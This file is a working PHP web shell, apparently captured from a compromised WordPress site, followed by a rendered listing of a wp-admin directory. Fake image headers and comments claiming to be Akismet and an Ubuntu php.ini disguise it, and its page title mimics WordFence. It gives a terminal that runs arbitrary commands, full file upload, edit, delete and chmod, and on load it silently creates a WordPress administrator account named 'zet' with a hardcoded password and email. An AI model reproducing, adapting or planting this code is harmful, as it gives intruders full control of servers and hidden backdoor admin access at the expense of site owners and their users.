__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
$假PNG头 = "\x89PNG\r\n\x1a\n";
"\头"\头"\头"\头"\头"\头
$假PNG头 = "\x89PNG\r\n\x1a\n
"\头"\头
$假PNG头 = "\x89PNG\r\n\x1a\n";
<?php
?>
GIF89a
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP Polyglot Example</title>
</head>
<body>
<h1>PHP Polyglot Demo</h1>
<?php
// This PHP code is completely harmless.
// It just prints today's date.
echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>
<p>This file starts with a GIF header, so some tools might classify it incorrectly,
but the contents are safe HTML + PHP.</p>
</body>
</html>
<?php
/**
* @package Akismet
*/
/*
Plugin Name: Sid Gifari SEO Code Uplaoder
Plugin URI:
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: Sid Gifari SEO Code Uplaoder - Team= Gifari Industries - BD Cyber Security Team
Author URI:
*/
/* %s: Title of the post the attachment is attached to. */
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Copyright 2005-2025 Automattic, Inc.
*/
?> <?php
/* PHP File manager ver 1.5 */
/**
* This file is part of the Ubuntu PHP configuration.
*
* Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
* Package : php
* Path : /etc/php/8.1/apache2/php.ini
*
* Description:
* This is a sample PHP configuration file used in Ubuntu.
* Do not edit this file directly unless you know what you're doing.
* For custom configurations, use the /etc/php/8.1/apache2/conf.d/ directory.
*
* License:
* Distributed under the same terms as PHP itself.
* See: https://www.php.net/license/3_01.txt
*/
// ================= CONFIG =================
$ROOT = __DIR__;
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?');
function encodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("A", "D", "I", "B");
return str_replace($a, $b, $path);
}
function decodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("A", "D", "I", "B");
return str_replace($b, $a, $path);
}
$root_path = $ROOT;
if (isset($_GET['page'])) {
if ($_GET['page'] === '') {
$p = $root_path;
} elseif (!is_dir(decodePath($_GET['page']))) {
echo "<script>alert('Directory is Corrupted and Unreadable.');window.location.replace('?');</script>";
exit;
} else {
$p = decodePath($_GET['page']);
}
} else {
$p = $root_path;
}
define("PATH", $p);
session_start();
// AUTO-SYNC: Always sync terminal cwd with file manager path
if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(PATH)) {
$_SESSION['cwd'] = realpath(PATH);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Terminal command execution - MUST BE FIRST to avoid conflicts
if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
// Allowed functions
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}
$cwd = $_SESSION['cwd'];
$cmdInput = trim($_POST['terminal-text']);
$output = "";
// Handle cd command
if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
$dir = trim($matches[1]);
if ($dir === '' || $dir === '~') {
$dir = $root_path;
} elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}
$realDir = realpath($dir);
if ($realDir && is_dir($realDir)) {
$_SESSION['cwd'] = $realDir;
$cwd = $realDir;
$output = "Changed directory to " . htmlspecialchars($realDir);
} else {
$output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
}
// Store output in session to display after redirect
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
// Redirect back with current path
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
} elseif ($canExecute) {
// Change to terminal's working directory
chdir($cwd);
$cmd = $cmdInput . " 2>&1";
// Execute command
if (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('proc_open')) {
$pipes = [];
$process = proc_open($cmd, [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
], $pipes, $cwd);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
}
} elseif (function_exists('popen')) {
$handle = popen($cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
}
}
// Store output in session
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
// Redirect back
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
} else {
$_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
}
}
// File manager actions (original code)
// Upload
if (!empty($_FILES['files'])) {
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
if ($tmp && is_uploaded_file($tmp)) {
move_uploaded_file($tmp, PATH . '/' . basename($_FILES['files']['name'][$i]));
}
}
}
// New Folder
if (!empty($_POST['newfolder'])) {
mkdir(PATH . '/' . basename($_POST['newfolder']), 0755);
}
// New File
if (!empty($_POST['newfile'])) {
file_put_contents(PATH . '/' . basename($_POST['newfile']), '');
}
// Delete
if (!empty($_POST['delete'])) {
$target = PATH . '/' . $_POST['delete'];
if (is_file($target)) unlink($target);
elseif (is_dir($target)) rmdir($target);
}
// Rename
if (!empty($_POST['old']) && !empty($_POST['new'])) {
rename(PATH . '/' . $_POST['old'], PATH . '/' . $_POST['new']);
}
// Chmod
if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
chmod(PATH . '/' . $_POST['chmod_file'], intval($_POST['chmod'], 8));
}
// Edit save
if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
file_put_contents(PATH . '/' . $_POST['edit_file'], $_POST['content']);
}
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
}
$items = scandir(PATH);
// Edit mode
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';
if ($editMode && is_file(PATH . '/' . $editFile)) {
$editContent = htmlspecialchars(file_get_contents(PATH . '/' . $editFile));
}
// Terminal output
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? PATH;
unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd']);
?>
<!DOCTYPE html>
<html>
<head>
<title>WordFence</title>
<head>
<style>
body{font-family:Arial;background:#f5f5f5}
.container{width:90%;margin:auto}
table{width:100%;background:#fff;border-collapse:collapse}
th,td{padding:8px;border-bottom:1px solid #ddd}
a{text-decoration:none;color:#007bff}
button{padding:5px}
.path-nav{background:#fff;padding:10px;margin-bottom:10px}
textarea{width:100%;font-family:monospace}
.terminal-output{background:#000;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap}
</style>
</head>
<body>
<div class="container">
<center><img src = "https://i.imgur.com/FC1enOU.jpeg"width="200" height="150"></img></center>
<center><h2>Sid Gifari File Manager</h2></center>
<!-- PATH NAV -->
<div class="path-nav">
<a href="?">🏠 Root</a> /
<?php
$path = str_replace('\\','/',PATH);
$parts = explode('/',$path);
$build = '';
foreach ($parts as $part) {
if ($part === '') continue;
$build .= '/' . $part;
echo '<a href="?page=' . urlencode(encodePath($build)) . '">' . htmlspecialchars($part) . '</a> / ';
}
?>
</div>
<?php if ($editMode): ?>
<!-- EDIT MODE -->
<h3>Editing: <?= htmlspecialchars($editFile) ?></h3>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" rows="10"><?= $editContent ?></textarea><br><br>
<button>Save</button>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>"><button type="button">Cancel</button></a>
</form>
<?php else: ?>
<!-- NORMAL MODE -->
<!-- TERMINAL SECTION -->
<div style="background:#333;color:#fff;padding:10px;margin-bottom:10px;">
<strong>root@Sid-Gifari:<?= htmlspecialchars($terminal_cwd) ?>$</strong><br>
<?php if ($terminal_output): ?>
<div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
<?php endif; ?>
<form method="post" style="margin-top:10px;">
<input type="text" name="terminal-text" style="width:40%" placeholder="Enter command">
<input type="submit" name="terminal" value="Execute">
</form>
</div>
<form method="post" style="display:inline">
<input name="newfolder" placeholder="Folder name">
<button>Create Folder</button>
</form>
<form method="post" style="display:inline">
<input name="newfile" placeholder="File name">
<button>Create File</button>
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<button>Upload</button>
</form>
<br><br>
<table>
<tr><th>Name</th><th>Size</th><th>Perm</th><th>Action</th></tr>
<?php foreach ($items as $f):
if ($f === '.' || $f === '..') continue;
$full = PATH . '/' . $f;
$perm = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td>
<?php if (is_dir($full)): ?>
📁 <a href="?page=<?= urlencode(encodePath($full)) ?>"><?= $f ?></a>
<?php else: ?>
📄 <a href="<?= htmlspecialchars($f) ?>" target="_blank"><?= $f ?></a>
<?php endif; ?>
</td>
<td><?= is_file($full) ? filesize($full) . ' bytes' : '-' ?></td>
<td>
<form method="post">
<input type="hidden" name="chmod_file" value="<?= $f ?>">
<input name="chmod" value="<?= $perm ?>" size="4">
<button>Chmod</button>
</form>
</td>
<td>
<?php if (is_file($full)): ?>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>&edit=<?= urlencode($f) ?>"><button>Edit</button></a>
<?php endif; ?>
<form method="post" style="display:inline">
<input type="hidden" name="old" value="<?= $f ?>">
<input name="new" placeholder="Rename">
<button>Rename</button>
</form>
<form method="post" style="display:inline">
<input type="hidden" name="delete" value="<?= $f ?>">
<button onclick="return confirm('Delete?')">❌</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</table>
<?php endif; ?>
</div>
</body>
<?php
if (!isset($_SESSION['wp_admin_created'])) {
session_start();
$wpPath = $root_path;
$found = false;
for ($i = 0; $i < 10; $i++) {
if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
$found = true;
break;
}
if ($wpPath === '/' || $wpPath === dirname($wpPath)) {
break;
}
$wpPath = dirname($wpPath);
}
if ($found) {
if (file_exists("$wpPath/wp-load.php")) {
@require_once("$wpPath/wp-load.php");
} elseif (file_exists("$wpPath/wp-config.php")) {
@require_once("$wpPath/wp-config.php");
}
if (function_exists('wp_create_user')) {
$username = 'zet';
$password = 'zet';
$email = 'bosseptp@gmail.com';
if (!username_exists($username) && !email_exists($email)) {
$userId = wp_create_user($username, $password, $email);
if (!is_wp_error($userId)) {
$user = new WP_User($userId);
$user->set_role('administrator');
$_SESSION['wp_admin_message'] = "✅ WordPress";
} else {
$_SESSION['wp_admin_message'] = "User creation failed";
}
} else {
$_SESSION['wp_admin_message'] = "User already exists";
}
} else {
$_SESSION['wp_admin_message'] = "WordPress functions not available";
}
} else {
$_SESSION['wp_admin_message'] = "WordPress not found";
}
$_SESSION['wp_admin_created'] = true;
}
$message = isset($_SESSION['wp_admin_message']) ? $_SESSION['wp_admin_message'] : '';
?>
</html>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| maint | Folder | 0755 |
|
|
| network | Folder | 0755 |
|
|
| user | Folder | 0755 |
|
|
| about.php | File | 16.08 KB | 0644 |
|
| admin-ajax.php | File | 5.03 KB | 0644 |
|
| admin-footer.php | File | 2.77 KB | 0644 |
|
| admin-functions.php | File | 479 B | 0644 |
|
| admin-header.php | File | 9.12 KB | 0644 |
|
| admin-post.php | File | 1.97 KB | 0644 |
|
| admin.php | File | 12.35 KB | 0644 |
|
| apreset.php | File | 112.74 KB | 0644 |
|
| async-upload.php | File | 5.47 KB | 0644 |
|
| authorize-application.php | File | 10.09 KB | 0644 |
|
| comment.php | File | 11.35 KB | 0644 |
|
| contribute.php | File | 5.86 KB | 0644 |
|
| credits.php | File | 4.38 KB | 0644 |
|
| custom-background.php | File | 489 B | 0644 |
|
| custom-header.php | File | 499 B | 0644 |
|
| customize.php | File | 11.01 KB | 0644 |
|
| edit-comments.php | File | 14.38 KB | 0644 |
|
| edit-form-advanced.php | File | 28.83 KB | 0644 |
|
| edit-form-blocks.php | File | 14.6 KB | 0644 |
|
| edit-form-comment.php | File | 8.34 KB | 0644 |
|
| edit-link-form.php | File | 6.21 KB | 0644 |
|
| edit-tag-form.php | File | 10.44 KB | 0644 |
|
| edit-tags.php | File | 22 KB | 0644 |
|
| edit.php | File | 19.48 KB | 0644 |
|
| erase-personal-data.php | File | 7.33 KB | 0644 |
|
| error_log | File | 557.75 KB | 0644 |
|
| export-personal-data.php | File | 7.75 KB | 0644 |
|
| export.php | File | 11.02 KB | 0644 |
|
| freedoms.php | File | 4.8 KB | 0644 |
|
| hidedz.php | File | 7.92 KB | 0644 |
|
| import.php | File | 7.58 KB | 0644 |
|
| index.php | File | 7.68 KB | 0644 |
|
| install-helper.php | File | 6.8 KB | 0644 |
|
| install.php | File | 17.77 KB | 0644 |
|
| link-add.php | File | 934 B | 0644 |
|
| link-manager.php | File | 4.26 KB | 0644 |
|
| link-parse-opml.php | File | 2.72 KB | 0644 |
|
| link.php | File | 2.89 KB | 0644 |
|
| load-scripts.php | File | 2.02 KB | 0644 |
|
| load-styles.php | File | 2.92 KB | 0644 |
|
| media-new.php | File | 3.2 KB | 0644 |
|
| media-upload.php | File | 3.58 KB | 0644 |
|
| media.php | File | 819 B | 0644 |
|
| menu-header.php | File | 9.82 KB | 0644 |
|
| menu.php | File | 17.46 KB | 0644 |
|
| moderation.php | File | 307 B | 0644 |
|
| ms-admin.php | File | 196 B | 0644 |
|
| ms-delete-site.php | File | 4.5 KB | 0644 |
|
| ms-edit.php | File | 216 B | 0644 |
|
| ms-options.php | File | 229 B | 0644 |
|
| ms-sites.php | File | 215 B | 0644 |
|
| ms-themes.php | File | 217 B | 0644 |
|
| ms-upgrade-network.php | File | 219 B | 0644 |
|
| ms-users.php | File | 215 B | 0644 |
|
| my-sites.php | File | 4.74 KB | 0644 |
|
| nav-menus.php | File | 48.19 KB | 0644 |
|
| network.php | File | 5.39 KB | 0644 |
|
| options-discussion.php | File | 15.92 KB | 0644 |
|
| options-general.php | File | 21.65 KB | 0644 |
|
| options-head.php | File | 621 B | 0644 |
|
| options-media.php | File | 6.38 KB | 0644 |
|
| options-permalink.php | File | 21.22 KB | 0644 |
|
| options-privacy.php | File | 9.95 KB | 0644 |
|
| options-reading.php | File | 9.94 KB | 0644 |
|
| options-writing.php | File | 9.1 KB | 0644 |
|
| options.php | File | 13.6 KB | 0644 |
|
| plugin-editor.php | File | 13.75 KB | 0644 |
|
| plugin-install.php | File | 6.96 KB | 0644 |
|
| plugins.php | File | 30 KB | 0644 |
|
| post-new.php | File | 2.7 KB | 0644 |
|
| post.php | File | 10.03 KB | 0644 |
|
| press-this.php | File | 2.34 KB | 0644 |
|
| privacy-policy-guide.php | File | 3.67 KB | 0644 |
|
| privacy.php | File | 2.79 KB | 0644 |
|
| profile.php | File | 283 B | 0644 |
|
| revision.php | File | 5.7 KB | 0644 |
|
| root.php | File | 21.08 KB | 0644 |
|
| setup-config.php | File | 17.48 KB | 0644 |
|
| site-editor.php | File | 11.98 KB | 0644 |
|
| site-health-info.php | File | 3.99 KB | 0644 |
|
| site-health.php | File | 10.2 KB | 0644 |
|
| term.php | File | 2.2 KB | 0644 |
|
| theme-editor.php | File | 16.87 KB | 0644 |
|
| theme-install.php | File | 23.38 KB | 0644 |
|
| themes.php | File | 47.92 KB | 0644 |
|
| tools.php | File | 3.43 KB | 0644 |
|
| update-core.php | File | 45.45 KB | 0644 |
|
| update.php | File | 12.79 KB | 0644 |
|
| upgrade-functions.php | File | 341 B | 0644 |
|
| upgrade.php | File | 6.27 KB | 0644 |
|
| upload.php | File | 14.9 KB | 0644 |
|
| user-edit.php | File | 40.36 KB | 0644 |
|
| user-new.php | File | 24.05 KB | 0644 |
|
| users.php | File | 23.29 KB | 0644 |
|
| w-a.php | File | 15.33 KB | 0644 |
|
| widgets-form-blocks.php | File | 5.12 KB | 0644 |
|
| widgets-form.php | File | 19.29 KB | 0644 |
|
| widgets.php | File | 1.09 KB | 0644 |
|